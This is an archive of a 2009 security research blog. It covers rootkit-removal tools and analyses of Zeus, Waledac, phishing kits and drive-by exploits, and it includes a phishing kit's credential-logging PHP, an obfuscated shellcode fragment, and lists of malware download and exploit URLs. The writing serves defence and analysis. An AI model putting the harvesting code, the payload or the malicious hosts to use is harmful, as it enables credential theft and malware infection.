Saturday, February 28, 2009

Rootkit Analytics: Updates

One more tool will be released by Ryan for Linux Kernel-mode rootkits, "SiD (Symbol Interception Detection)". We are still working on the content and the Windows User-mode Rootkit analysis tool by Naga.

The most probable release date for would be Mar 8th, 2009.

- EF

Friday, February 27, 2009

LuckySploit, the right hand of Zeus

LuckySploit is the name of a set of scripts (Toolkit) designed to exploit different vulnerabilities and allow execution of binaries on the computer a victim of an arbitrary manner.

Currently, these scripts are subjected to obfuscation, is being used by botnet Zeus to recruit zombies PCs through Drive-by-Download attack.

When accessing the website only displays a blank page, but to check its source code is a code written in JavaScript like this:

The script is encrypted with the RSA algorithm. This information is displayed at the end of the code.

Another interesting fact is that the script is displayed only once, ie, if you try to log back in to the same address, again to check the HTML source code, the script is no longer available.

Some of the domains that contain LuckySploit are reflected below:
r-state .com/ equi/
trafffive .cn/wait/ ?t=15
trafffive .cn/bm/ ?t=15
directlink9 .cn/wait/ ?t=15
directlink4 .cn/bm/ ?t=15
directlink2 .cn/wait/ ?t=15
directlink1 .cn/bm/ ?t=15
directlink0 .cn/wait/ ?t=15
superioradz .info/opis3/ ?t=2
superioradz .info/opis2/ ?t=2
rodexcom .org/parus/ ?t=5
dvlorg .net/parus/ ?t=25
top.sei-keine .com/u-store/ ?t=1
statclick .net/main/ ?t=1
deinglaube .com/ images/ tomi
federalreserve.banknetworks .net/bb/ ?t=2
fuadrenal .com/mito/ ?t=2
fuck-lady .com/prn/index .php
hello-to-you .net/rttz/ ?t=6

It's worth noting that many of these URL's are active, therefore if you decide to access any of it, keep in mind the safety measures appropriate to the case.

In some script clearly read at the end of a message that says:
attack_level = 0;;
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';

In this way, Zeus is adhering to its network equipment malicious computer infected.

Related information:
Zeus botnet. Mass propagation of trojan. Part two - Spanish version
Zeus botnet. Mass propagation of trojan. Part one - Spanish version
Malware attack via Internet - Spanish version

# Jorge Mieres

Wednesday, February 25, 2009

Phishing Kit In-the-Wild for cloning of web site, version 2

A few days ago I said that is an asset package containing files phishing websites cloning well known and heavily used by the users ready to be exploited.

This package has expanded its "coverage" of fraud, offering a second package with a large quantity of fake websites that seek to be transparent to the user and obtain their information.

Phishing kit keeps the same strategy of spreading the pack earlier, ie, an index.html file that is a true copy of the actual page, login.php and a .txt, but not the proposals of cloning to steal data:

Adult Friend Finder
Playstation Underground
Tripod - Lycos
XTube - Images R Broken

On the one hand, strategies that seek to raise money without major efforts are becoming more aggressive and more invasive, and on the other hand, most of these kits are available online for free or against payment, in this case, a sum of money not as high as with similar pack.

Phishing attacks are becoming more dangerous because its creators are seeking efficiency in the development of the copy to be as faithful as possible to the real. This represents a potential risk associated with the combination with intrusive techniques such as malware kit (ElFiesta, MPack, IcePack, etc..) that are implanted in servers ghosts or violated to disseminate phishing, is becoming increasingly dangerous for those unknown, even to those who know well, the functioning of these attack techniques.

Related Information
Phishing Kit In-the-Wild for cloning of web site

# Jorge Mieres

Tuesday, February 24, 2009

Zeus botnet. Mass propagation of trojan. Part two

In the first part, we were well above what it's Zeus, next to a small list of domains and IP addresses involved in the trojan and very useful to block them.

The map below shows information regarding each host infected by Zeus who is identified through a point. Although at first glance, the information shown in the map may feel inadequate, it must be remembered that each node can represent multiple IP addresses or domains hosted on one server, so the percentage of equipment infected power.

Although the list is very small compared with the number of domains that host Zeus, is extremely important that managers locked themselves in their network structure to avoid infection. .jpg .jpg .exe .exe .exe .exe .bin .bin .exe .php .exe .exe .exe .exe .exe .exe .exe .exe .bin .exe .bin .bin

Furthermore, each of the domains, along with its IP address, representing an infected host or server violated.

Given that the spread of infection and are employed by Zeus, email and technical Drive-by-Download through different exploit where one of the best known is Luckysploit, or sites which are vulnerable to malware implanted kits as ElFiesta, it is extremely important to block domains and IP addresses that I have outlined.

Related Information

Zeus botnet. Mass propagation of trojan. Part one

# Jorge Mieres

Monday, February 23, 2009

Spammers spreading malwares through Oscar 2009 award message

Freewebs& is abused to spread the malware































hxxp:// Spreading HTTP Fake Codec

hxxp:// Spreading TROJ_FAKEAV.TJ

hxxp:// Js.downloader

hxxp:// 37 exploits


hxxp:// spreading Trojan-Downloader.Win32.FraudLoad.vkva (Detected by kaspersky)

Search tags:

oscar_winners,oscar awards,oscar_schedule,printable_oscar_ballot


rs_on_tv,oscar_live_stream,oscar_night, oscar_pre_show, oscar_coverage, what_time_do_the_oscars_start , what_channel_are_the_oscars_on , oscar_picks, what_channel_are_the_oscars_on, oscar_red_carpet_live, abc_oscars, oscar_odds, watch_oscars_online, miley_cyrus_oscars, oscars_2009_time, oscar_bingo, oscars_tonight, oscars_2009_time, oscar_predictions, 2009 Oscar winners,

- Analysis by Kalyan

Spyware Analytics: Forum to choose...

Spyware Analytics

We are in the process of finding out the best forum software to use. "Best" is a relative term, and always depends on what one is looking for.
* Security
* Usability
* Look & Feel
* Features

We looked at and other sites that gives comparison of blogs. Though many sites list Discusware and FuseTalk as the two secure forum software. We like the really cool look and feel of IP.Board from InvisionBoard. But being a security forum, we should give first preference as listed in the 4 things we are looking for.

If you have any suggestions, experiences and more that you wouldn't mind sharing with us, contact us at contact.fingers @

- EF

Sunday, February 22, 2009

Malware Analytics: Status update - Releasing very soon

MalwareAnalytics portal is releasing in 2-3 weeks. The static part and backend is complete. We are almost about to complete the dynamic part. Thanks to Bonfa and his 2 friends for their hard work and dedication. We have also worked on load balancing, anti-reversing and anti-Virtual Machine Detection.

If you guys know any reliable and cost effective, dedicated-server hosting services or data centers, kindly contact us at contact.fingers @

- EF

Saturday, February 21, 2009

Google Groups again used to spread porn spam

Spamming techniques are becoming increasingly aggressive and spammers, so continuing with the financial industry behind unsolicited advertising, focusing all its efforts to seek "alternatives" to bypass authentication mechanisms implemented in webmail servers.

Consequently, in recent days, the cells of millions of users have been bombarded by a significant amount of spam on matters referring to erotic or pornographic videos of celebrities, using the Google group service to disseminate pornographic spam.

Some of the phrases used in the case to capture the attention of the users are:

Hey! It is Erica. Wanna date?
Hi! This is Dana from last Monday video shoot. Hello!
It is Norma. Couldn't reach you.
Jessica Alba was caught naked in sauna!
Jennifer Aniston was caught naked in sauna!
Jennifer Love Hewitt's nude beach photos!
Cameron Diaz's nude beach photos!
Denise Richards's fitting room hidden pics!
Shakira and her mystery boyfriend pics!
Hi! It is Deena. Fresh teens who just got legal to pose.
Hi! This is Amelia. Fresh teens who just got legal to pose.

On the other hand, some of the profiles used in the service in question are:

The list is really long to reflect each address in this post, however, the examples are enough to get an idea in sufficient detail to understand that spam is a problem that affects everyone equally and that the today is one of the most exploited.

# Jorge Mieres

Detecting Kernel-Level Rootkits Through Binary Analysis

One of our new guys[Gustavo Delgadillo] mentioned about this paper to EF, for LKM based Rootkit detection. We thought of sharing with our blog readers. Read and Enjoy!!!


Rootkits are tool sets used by intruders to modify the
perception that users have of a compromised system.
In particular, these tools are used by attackers to
hide their actions from system administrators. Originally,
rootkits mainly included modified versions of
system auditing programs (e.g., ps or netstat on a
Unix system). However, for operating systems that
support loadable kernel modules (e.g., Linux and Solaris),
a new type of rootkit has recently emerged.
These rootkits are implemented as kernel modules,
and they do not require modification of user space
binaries to conceal malicious activity. Instead, the
rootkit operates within the kernel, modifying critical
data structures such as the system call table or the
list of currently-loaded kernel modules.

This paper presents a technique that exploits binary
analysis to ascertain, at load time, if a module’s
behavior resembles the behavior of a rootkit.
Through this method, it is possible to provide additional
protection against this type of malicious modification
of the kernel. Our technique relies on an abstract
model of module behavior that is not affected
by small changes in the binary image of the module.
Therefore, the technique is resistant to attempts to
conceal the malicious nature of a kernel module.
Keywords: Rootkits, Binary Analysis, Kernel Hardening.

This paper is available here.

- EF

Xprobe2 PCAPs

Feb 2009 PCAPs have been released. Sorry for the delayed release. [Thanks to Kalyana.]

The PCAPs are available here.

For more on XProbe, click here for the Blackhat'03 Slides and the full PDF version of the formal paper is available here. Though, this paper was released in 2003, the idea is still current and futuristic. Thanks to Ofir Arkin, Fyodor Yarochkin and Meder Kydyraliev, for their research.

If you find any glitches, errors or questions... contact us at contact.fingers @

- EF

Friday, February 20, 2009

Welcome our new blogger! - Joe from

Welcome our new blogger, Joe[Stefan Buehlmann]!!! Joebox is a simple sandbox application with a unique special concept. It is designed for automatic behavior analysis of malware on Windows based operating systems.

You could submit your binaries here for analysis.

The architecture of Joebox can be found here:
Version 5.0[Latest]
Version 4.0
Version 3.0
Version 2.0
Version 1.0

If you have any questions contact info @ and they would respond to your question.

- EF


Really cool paper on QEMU: "SecureQEMU: Encrypted Code Execution using Dynamic Binary Translation for Software Protection" is available here.

Thanks to Joe from for leading us to this interesting paper.

Read and Enjoy!!!

- EF

Attacks - Weaknesses of security commonly exploited

Abstract: Throughout time, the advancement of technology and communication has led to the emergence of new attack vectors and new forms of crime that have turned to the Internet and computer technologies in areas most hostile to any kind of organization, and person that has equipment connected to the World Wide Web.

Unlike what happened years ago, where people with extensive skills in the computer world enjoyed researching these issues with the aim of incorporating more knowledge, at present has been completely distorted giving rise to new characters who use computer resources and knowledge on its operations as tools to commit crime and get some economic benefit.

Every day new vulnerabilities are discovered and, usually, only those responsible for IT including in its just measure the importance of safety and how they can address the serious problem that exists behind vulnerabilities that allow an attacker to violate security environment and commit crimes using the data stolen.

Click here to

- EF

Análisis de un ataque de malware basado en web

Abstract: Internet se ha transformado en una aliada plataforma de ataque para los creadores de malware, quienes a través del empleo de diferentes técnicas tales como Drive-by-Download, Drive-by- Update, scripting, exploit, entre otros, y la combinación de ellos, buscan reclutar todo un ejercito de computadoras que respondan sólo a sus instrucciones maliciosas.

Estos ataques, empleando Internet como base para ejecutar cargas dañina de manera directa sobre el sistema víctima, de forma paralela, casi instantánea y transparente a la vista de los usuarios menos experimentado, se ha convertido en un latente y peligroso riesgo de infección por el simple acto de acceder a un sitio web.

En el siguiente documento se expone un ejemplo concreto que recurre a las acciones antes mencionadas para explotar e infectar un sistema víctima, describiendo también varias características extras que potencian el daño del malware.

Click here to

- EF

Thursday, February 19, 2009

SpywareAnalytics: Analytics forum for everyone...

Spyware Analytics

Security forum for researchers, engineers, analysts and home users to encourage discussions and provide solutions for spyware analytics and related questions. This is a futuristic project and requires dedicated volunteering. If you would like to be a part of this project, contact us at contact.fingers @ Before you send us an email, kindly:
* ensure that you are cool with dedicating few hours/week,
* ensure that you would consider this as one of your top priority tasks,
* ensure that you would not do this just for your resume.

- EF

Wednesday, February 18, 2009

Zeus botnet. Mass propagation of trojan. Part one

Speaking of phishing attacks or kits at this point in history is nothing new, nor is talk of malware infection techniques and their increasingly sophisticated and increasingly aggressive, however, and the spread of infection and fraud continues even at present is a business, apparently very profitable for those who are behind it.

Zeus (also known as Zbot or wsnpoem), just gets in the category of fraudulent and malicious. This is basically a trojan designed to recruit PCs zombies and phishing attacks, financial institutions, banking, social networking sites, stealing data from email authentication, FTP accounts, etc., combining techniques of scripting, exploit, among others. .exe .exe .exe .exe .php .exe .bin .txt .exe .exe .exe .exe .exe .exe .exe .txt .exe .exe .ini .bin .exe .php?id=861&spl=7 .world .exe .bin .exe .exe .exe .txt .txt .exe .ini .bin .sts .exe .bin .exe .exe .exe .bin .bin

It's quite dangerous if we consider that in addition to the typical actions of the malware, can be obtained by any person to deposit a certain amount of money in the account of its creators.

Perhaps this is one of the best reasons to argue why the many variants of "Zeus" who are In-the-Wild wiles to recruit zombies looking for our systems. The truth is that, although not up to its name, is one of the largest botnet of the moment.

Even though this last feature is threatened by other "alternatives" of the world as a botnet Waledac, recent Adrenalin, or smaller (in magnitude) Asprox (also known as Danmec) really must be careful not to be victims of these threats are always looking to successfully carry out its mission: to get our money and computer resources.

Related information
Waledac more loving than ever Spanish version
Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs Spanish version

# Jorge Mieres

Trojan Analytics: Backend DB

(The new Logo)

Trojan analytics is portal that is aimed at research and analysis of Trojans. As mentioned in one of the previous blogs "Trojan Analytics - Coming Soon", Trojan analytics will be concentrating on different types of Trojans including [but not limited to] application-layer Trojans, Trojan backdoor, Trojan bots, Trojan rootkits, and more.

To put this together, we are talking to and other sites to create a back-end that is capable enough to help us in analysis and classification or Trojans that we discover. Naming conventions, family tree/type classification, etc. are currently being sorted out.

- EF

Tuesday, February 17, 2009

Rootkit Analytics: Detection Techniques

Detection techniques can be classified into the following basic categories:
  • Signature-based Detection
  • Heuristics-based Detection
  • Comparison-based Detection:
    § Cross-view based Detection
    § Integrity-based Detection
We are currently reviewing existing tools and techniques, researching and building tools in these categories. Kindly, let us know if you think that we have missed any categories[email: contact.fingers @].

For more on our reviews and research, stay tuned.

- EF

Monday, February 16, 2009

Phishing Kit In-the-Wild for cloning of web site

One of the most common strategies for Phishing attacks are located in the use of cloning site, ie a fake page is very similar to the right by which seeks to steal confidential and financial nature of people through Internet.

This kit suggests Phishing just that. This is a set of web pages from popular sites ready to be uploaded to a ghost server and begin to spread (spam) targeted by social engineering, as it can't be otherwise, to exploit the weaknesses of the weakest link in the security chain: the human factor.

For the moment, and I say for now because surely those who distribute this kit iran expand the range of cloning, the proposals for Phishing attacks are:
EverQuest Forum (Packstation)

As you will see, many of the pages are heavily used and widely known.

Each of the folders that contain cloning housed, in addition to index.html, a plain text file where it stores the recorded information of the victim and a login.php which contains the following code:
header ('Location: website');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

Where the function header ( 'Location:') contains information on the website and $handle = fopen ( "log.txt", "a") opens the text file log.txt in opening mode and writing.

Most of these cloning are active so it's necessary to be vigilant when accessing web sites whose services are similar.

On the other hand, clearly shows that the kit was designed to commit fraud, and the fact of being available on the Internet makes it even more dangerous boosting the chances of being potential victims of these fraudulent actions.

# Jorge Mieres

Sunday, February 15, 2009

IRC Channel for EvilFingers Community

Community (contributors and users),
You are most welcome to join #evilfingers in freenode for any related discussions.

- EF

Rootkit Analytics - Part 2

As discussed in previous blogs, we are working on the different layers of rootkit analytics. The first version of our website [ - Coming Soon!!!] will be releasing by the end of Feb 2009. Stay Tuned!!!

We are looking for volunteers with the following specialties:
  • Processor/Microcode Experience
  • BIOS Programming Experience
  • Kernel Programming Experience

But, if you are experienced in rootkits or anything related to the same, kindly contact us as soon as possible, and we will work out a plan customized just for you.

- EF

Rootkit Analytics

Welcome to Rootkit Analytics!!!
User-mode Rootkit Analytics:
Our first tool in this category would be SpyDLL, which would monitor injected process and injected modules inside the processes. We also provide option for the user to remove DLL without shutting down the process and an option to terminate the process itself. This tool will be expanding just like any other tool on our site.

Our next tool in user-mode rootkit analytics would be, WinInternals. This tool will give anything and everything required for a Windows based user-mode rootkit analytics that includes an extended edition of Process Memory Dumper[PMD].

Kernel-mode Rootkit Analytics:
Our first tool in this category would be ElfStat. More about this tool will be discussed in the near future.

The following are our members [sorted alphabetically] in Rootkit Analytics team so far:
Team Leads:
Kirk McGraw [Team Lead/Creator: WinInternals]
Nagareshwar Talekar [Team Lead/Creator: SpyDLL]
Ryan O'Neill [Team Lead/Creator: Elfstat]
Team Members:
Blake Hartstein [Team Member]

There are others whom we are still communicating with, for them to become a part of our team. The normal procedure of joining Rootkit Analytics is to either join EvilFingers in any of the teams and then once the member has proven their skills, they would be moved to any of our analytics divisions depending on their skill set. But we do consider direct volunteering for Rootkit Analytics division if you have prior hands-on anti-rootkit or related experience.

We are still working on expanding our research to other directions such as, application, hardware and firmware rootkits.

Contact us at contact.fingers @[because GMAIL rocks].

- EF

Saturday, February 14, 2009

Waledac more loving than ever

As I said in previous post, Waledac is a worm whose main objective is to recruit zombie PCs and use the full potential distributed more malicious code to propagate and disseminate more unwanted email.

For about a month, this worm started spreading their campaign of using as an excuse, and ahead, the day of love that is celebrated today, February 14, worldwide.

Now, it seems to have saved their entire battery of visual strategies of social engineering to this day, renewing its entire repertoire displaying the following images:

** More pictures

It has also changed the name of the binaries:

reader.exe MD5: A9286212E0D7B46841C860FD3F058DFA
patch.exe MD5: 1C5E4A7FCBE766133F743C9A0150373D
loveexe.exe MD5: 5C17F98919D2C84C3FD1908630396BB7
cardviewer.exe MD5: E2F9C7A76581047D493FDE2C4A02737A

As seen through the reporting of VT, Waledac currently has a low level of detection by the antivirus signatures, ie, hasn't only changed the repertoire of images but also the code of the binaries, even more dangerous.

# Jorge Mieres

Friday, February 13, 2009

Trojan Analytics - Coming Soon

Trojan analytics will be concentrating on different types of Trojans including [but not limited to] application-layer Trojans, Trojan backdoor, Trojan bots, Trojan rootkits, and more. We are looking forward to partner domains of similar interests.More details coming soon...

- EF

Thursday, February 12, 2009

Lavasoft ARIES Rootkit Remover

Similar to PrevX Gromozon remover, Lavasoft has a specialized Anti-Rootkit tool called the Lavasoft ARIES Rootkit Remover. Very simple to use and very fast in getting things done.

One click scan GUI:

Dialogue box indicating acceptance of critical action:

Ends with results page:

Now, how simple is that. It took less than 30 seconds for the entire scan process. This is a specialized tool and hence time cannot be compared with the efficiency of other generic anti-rootkit tools.

If you wish to volunteer for this project, kindly email us at contact.fingers @

- EF

Waledac, Social Engineering and San Valentine Day

For malware current events, news or special circumstances is used as a method of deception to spread itself or other malicious code, and junk e-mail one of the most commonly used attack vectors for this purpose.

Our mailboxes are examples that describe this situation. Valentine's Day (or fans) is one of them, and if we look a little spam that inundates us, see that many make some reference to the nearby celebration.

In fact, waledac has begun its campaign to spread well before using as a spreading delusion typical image that alludes to the love by which you download a binary called love.exe that far from being loving, infects your computer into a zombie.

As a bonus, earlier this year, in addition to downloading the malware, the page containing a malicious exploit. Among them were:

googol-analisys .com seocom .name seocom .mobi seofon .net goog-analysis .com

Recently, however, developers have migrated to another image that seeks to find the same degree of "tenderness" to waledac downloading.

Some of the names used for the binary:






Waledac uses Fast-Flux networks and some of the domains are used to propagate:

adorelyric .com
adorepoem .com

adoresongs .com
alldatanow .com

alldataworld .com

bestadore .com

bestlovehelp .com

bestlovelong .com

cantlosedata .com

chatloveonline .com

cherishletter .com

cherishpoems .com

freedoconline .com

funloveonline .com

goodnewsdigital .com

losenowfast .com

mingwater .com

orldlovelife .com

romanticsloving .com

superobamaonline .com

theworldpool .com

topwale .com

wagerpond .com

whocherish .com

worldlovelife .com

worldtracknews .com

worshiplove .com

youradore .com

yourdatabank .com

yourgreatlove .com

yourteamdoc .com

Many compare it to other malicious code as Nuwar (also known as storm or the storm worm) because of the similarity of their strategies for dissemination and malicious activities performed in the infected computer. However, the reality is that waledac is a dangerous malicious code that has been one of the largest botnet networks of the time.

Related information:
Understanding Fast-Flux networks
Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs

# Jorge Mieres

Wednesday, February 11, 2009

Panda Anti-Rootkit

Panda Security Anti-Rootkit Suite.

We will be collecting and analyzing rootkits pretty soon with the preexisting toolkits such as these and compare the tools on various stages:

  • Preparation & Detection/Monitoring

  • Containment/Isolation

  • Eradication/Quarantine

  • Recovery/Patching

We will look at the various characteristics such as time taken and the overall cleaning process too.

To start with, Panda Anti-rootkit starts with a one click screen where the users can scan rootkits:

Once the users have chosen whether to allow auto-update or not, and the option to go to an in-depth scan[which is most likely recommended, since simple scans on any case might be fast, but what is fast might not be what is efficient at all times.], the software takes you to a Reboot system screen which allows the user to restart their system to make the changes [It is recommended to reboot the system before the scan]:

Once the system reboots, the scanning process automatically starts with the following 6 layers of scan,

  • Running Processes

  • Windows Registry

  • User and kernel hooks

  • Services and Drivers

  • Files and ADS

  • Evaluating Incidents

Second snapshot, that shows progress in the scanning process:

When the process has come to an end a report gets listed as seen in the following image:

If you wish to participate or if you have questions, email us at contact.fingers @


Tuesday, February 10, 2009

Exploiting vulnerabilities through SWF

One of the formats used to massively exploit the weaknesses of the teams are the Small Web Format files .swf. Usually, they're often subjected to the injection of the exploit code to undermine a particular bug.

The same wave file attacks using malicious JavaScript that had been mentioned in the post of vulnerabilities through files .js, was combined with other alternatives such as this.

In this case, it exploits a vulnerability in Adobe Flash Player described in CVE-2007-0071 by which through a file .swf manipulated maliciously causes a Buffer Overflow allows code execution by a remote attacker.

This means that if the user accesses, for example, the URL http://www.710sese .cn/a1 / ( the file is executed f16.swf (MD5: 95EC9202FBE74D508205442C49825C08) that according to the report VirusTotal , is detected by antivirus 18 of 39 for which the sample scanning. The insert in the exploit .swf exploit the vulnerability if you have installed the application and be vulnerable.

Some of the URLs used to spread the exploit are:

http://www.710sese .cn/a1/f16 .swf
http://www.710sese .cn/a1/f28 .swf

http://www.710sese .cn/a1/f45 .swf

http://www.710sese .cn/a1/f47 .swf

http://www.710sese .cn/a1/f64 .swf

http://www.710sese .cn/a1/f115 .swf

http://www.710sese .cn/a1/i28 .swf

http://www.710sese .cn/a1/i16 .swf

http://www.710sese .cn/a1/i45 .swf

http://www.baomaaa .cn/a279/f16 .swf

http://www.baomaaa .cn/a279/f28 .swf

http://www.baomaaa .cn/a279/f45 .swf

http://www.baomaaa .cn/a279/f47 .swf

http://www.baomaaa .cn/a279/f64 .swf

http://www.baomaaa .cn/a279/f115 .swf

http://www.baomaaa .cn/a279/i28 .swf

http://www.baomaaa .cn/a279/i16 .swf

http://www.baomaaa .cn/a279/i45 .swf

http://000.2011wyt .com/versionff .swf

http://000.2011wyt .com/versionie .swf

http://sss.2010wyt .net/versionie .swf

http://sss.2010wyt .net/versionff .swf
http://www.misss360 .cn/versionff .swf

http://www.misss360 .cn/versionie .swf .cn/a08_1272/m16 .swf .cn/a08_1272/m28 .swf .cn/a08_1272/m45 .swf

http://ccsskkk .cn/new7/fl/f16 .swf

http://ccsskkk .cn/new7/fl/f28 .swf

http://ccsskkk .cn/new7/fl/f45 .swf

http://ccsskkk .cn/new7/fl/f47 .swf

http://ccsskkk .cn/new7/fl/f64 .swf

http://1.ganbobo .com/template/kankan/js/4.0/curtain .swf

http://1.ganbobo .com/template/kankan/js/4.0/playerctrl .swf

Once it explodes in your computer, download the binary a1.css from http://d.aidws .com new, a malicious code which we have already mentioned in other post.

Related information:
Exploitation of vulnerabilities through JS

# Jorge Mieres

Monday, February 9, 2009

SpyDLL Eraser - Rootkit Analytics Tool

SpyDLL Eraser is our first tool release for our Rootkit Analytics domain.

Title : SpyDLL Eraser ( win32 GUI application)

Description : Tool to remove the specified DLL from one or more processes. Many trojan backdoors, rootkits, other malware and spyware process inject their dll into legitimate processes [explorer.exe, lsass.exe, etc.] to keep their activities hidden and to protect themselves from being killed. Some use DLL injection, while others use plugin approach to get their dll loaded into these legitimate processes. This tool will help to distinguish between normal DLL and malicious DLL and help the user to completely erase it.

Features :
* List all running processes
* For each process following information to be displayed
+ process name
+ full path
+ company name
+ version
+ size
+ process start time
+ process memory details
+ modified/access date
* Display specific icons for different kind of processes such as
system processes, services
* For selected process, display all loaded DLLs with following information
+ DLL name
+ Full path
+ Company Name
+ Size
+ Load/.Reference Count
+ Modified/access date
* Differentiate between statically & dynamically loaded DLLs. User should be able to select only dynamically loaded dlls.
* DLL Search feature to look for specified DLL in all listing
processes and list all these processes
* Remove the user specified dll from all running processes automatically.

More features are being added at the moment. Stay tuned for further updates. Contact us at contact.fingers @, if you have any questions.

- EF

Sunday, February 8, 2009

Prevx Gromozon Rootkit Removal tool

Prevx has a specialized tool for removing a specific Rootkit.Gomozon Rootkit Removal tool is highly focused only for this special rootkit removal. Hence, if you are looking for a generalized anti-rootkit tool, this is not the one for you. The starting window very clearly specifies the same, as shown in the following image[SNAP 1].

SNAP 1 :

The tool then warns the user, that one should disable any system security tools, such as an Anti-virus, that may interfere with the removal of Gromozon rootkit, as shown in SNAP 2.

SNAP 2 :

The tool is quite fast in performing a preliminary check for Trojan.Gromozon rootkit component and allows the user to decide to proceed with the removal or to quit, as shown in SNAP 3.

SNAP 3 :

Once the user chooses to continue with the removal process, the next warning window comes up requesting the user to save all unsaved applications to continue with system rebook, as seen in SNAP 4.

SNAP 4 :

After the system has been rebooted, the scan begins [SNAP 5].

SNAP 5 :

Once the scanning and cleaning is complete, the scan details along with logging details are displayed to the user[SNAP 6].

SNAP 6 :

Log lets generated as shown in the above snapshot in a file named "gromozon_removal.log". Since we did not have any event triggered, and since no hidden files were found, there was nothing really to show a snapshot.

If you wish to participate in this project in a dedicated fashion or in any other projects, kindly email us at contact.fingers @

- EF

Creating Online polymorphic malware based PoisonIvy

Obviously, the creators and propagators of malicious code found in this way of life a profitable than keeping them on a daily focus on creating new alternatives that allow them to earn "extra money" by means of malicious programs where time, cost and benefit attributes appear to be seeking in their applications.

Joined the Internet today is also a hostile environment, when it's used taking into account the minimum and necessary precautions in terms of security, is used as a platform to commit various types of attacks and, as in this case, offer a variety "services", including the creation of malicious code.

This is the online version of PoisonIvy called Polymorphic PoisonIvy Builder Online, a trojan known within the world of malware that respects the classic creation of malicious code to create a trojan (server) that spreads to infect computers and then control those infected computers to through the client program.

However, this online version has an extra component that makes the result in a much more dangerous malware that created the conventional way of adding features polymorphic. This means that each binary set up by means of this automatic is different because it completely changes your code.

This feature seeks to evade detection by antivirus signatures and prolong their life cycle, implying that at least the AV detected more money generated by their creator.

This package is written in PHP/ASM and while the creation of malware is done online, isn't free, is marketed at a price of U$S 500. In the screenshot we can see its features:

This situation is merely another of the many shows that make it clear that malware is a business, an industry where more and more developers to join their ranks.

# Jorge Mieres

Saturday, February 7, 2009

Busy Weekend

Working on few portals that will be releasing soon under EvilFingers. Will keep you guys posted on it pretty soon.

- EF

Friday, February 6, 2009

Exploitation of vulnerabilities through JS

Exploiting vulnerabilities across different types of file format has become common currency in a highly used by the creators and disseminators of malware.

These methods, which are also combined with different strategies, they become a time bomb that detonates with the simple action of accessing a page maliciously manipulated to accommodate the strategies of attack.

Numerous cases, such as taking advantage of various weaknesses exploited through the archives .js, .swf, .pdf, .mp3, even pretending to be files .css, make clear that any type of file is free to be used as channel spread much less as a vector for infection.

In recent weeks, a wave file .js is being used to redirect the download of malicious code through obfuscated scripts that hide in the body of the JavaScript like the following that is hosted at URL http://www.710sese .cn/a1/realdadong. js in md5 hash which is d1094b907dfe99784b206d2ae9b1fe97:

var mybr = unescape("%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%

The issue is that between the lines of this script obfuscated, running downloading a binary file from a different URL, called a1.css. This binary is a malware.

Furthermore, between half of the entire process of infection, which lasts only a few seconds, connecting to the sites txt.hsdee .com and www.wdswe .com, where, since the former makes a Drive-by Update on file oo.txt for when responds with an 200 "OK", download the binaries in the file. The first of them since http://www.wdswe .com/new/new1. exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

The information is read from the text file is as follows:

url1=http://www.wdswe .com/new/new1 .exe
url2=http://www.wdswe .com/new/new2 .exe
url3=http://www.wdswe .com/new/new3 .exe
url4=http://www.wdswe .com/new/new4 .exe
url5=http://www.wdswe .com/new/new5 .exe
url6=http://www.wdswe .com/new/new6 .exe
url7=http://www.wdswe .com/new/new7 .exe
url8=http://www.wdswe .com/new/new8 .exe
url9=http://www.wdswe .com/new/new9 .exe
url10=http://www.wdswe .com/new/new10 .exe
url11=http://www.wdswe .com/new/new11 .exe
url12=http://www.wdswe .com/new/new12 .exe
url13=http://www.wdswe .com/new/new13 .exe
url14=http://www.wdswe .com/new/new14 .exe
url15=http://www.wdswe .com/new/new15 .exe
url16=http://www1.wdswe .com/new/new16 .exe
url17=http://www1.wdswe .com/new/new17 .exe
url18=http://www1.wdswe .com/new/new18 .exe
url19=http://www1.wdswe .com/new/new19 .exe
url20=http://www1.wdswe .com/new/new20 .exe
url21=http://www1.wdswe .com/new/new21 .exe
url22=http://www1.wdswe .com/new/new22 .exe
url23=http://www1.wdswe .com/new/new23 .exe
url24=http://www1.wdswe .com/new/new24 .exe
url25=http://www1.wdswe .com/new/new25 .exe
url26=http://www1.wdswe .com/new/new26 .exe
url27=http://www1.wdswe .com/new/new27 .exe
url28=http://www1.wdswe .com/new/new28 .exe

This will produce the number of malicious code infection, most of them designed to steal authentication credentials for online games like WoW.

Some other URL's used to spread malware in the same way are:

http://97.haowyt .com/js/baidu .js
http://97.haowyt .com/js/baidu .js

http://www.163wyt .com/js/yahoo .js

http://www.710sese .cn/a1/hohogl .js

http://www.710sese .cn/a1/wokaono .js

http://www.710sese .cn/a1/woriniss .js

http://qq.18i16 .net/lzz .js

http://qq.18i16 .net/bf .js

http://qq.18i16 .net/realplay .js

http://qq.18i16 .net/new .js

http://qq.18i16 .net/cx .js

http://www.baomaaa .cn/a1/realdadong .jshttp://www.baomaaa .cn/a1/hohogl .js

http://www.baomaaa .cn/a1/wokaono .js

http://www.baomaaa .cn/a1/woriniss .js

http://tj.gan7788 .com/js/js .js

http://sss.2010wyt .net/r .js

http://sss.2010wyt .net/614 .js

Despite the job by the creators of malware, advanced techniques of infection, there is an element that can avoid becoming victims of similar attacks focused purely on keeping updates completely up to date, including applications.

# Jorge Mieres

Wednesday, February 4, 2009

F-Secure BlackLight

F-Secure BlackLight

Help Page gives all details about BlackLight along with their snapshots on how it works.

* Free
* Fast
* Easy to use.

* Users dont get to choose any advanced options.
* Users dont get to know the Stimulus-Response process used in the backend for analysis. This is the case with every commercial tool.

Snapshot of Start page:

Snapshot of SCAN Start page:

Snapshot of SCAN Complete page:

Snapshot of SCAN Results page:

We are coming up with features comparison graph and charts, which will be completed based on all the rootkit-analysis tools that we are considering for comparison. If you have any rootkit analysis tools that you would like us to consider for this comparison project, kindly contact us.

Note: The comparison would have a comprehensive list of vectors on which we would compare. The pros & cons list over here is NOT a real vector for comparison, and hence would not be considered in the comparison project.

- EF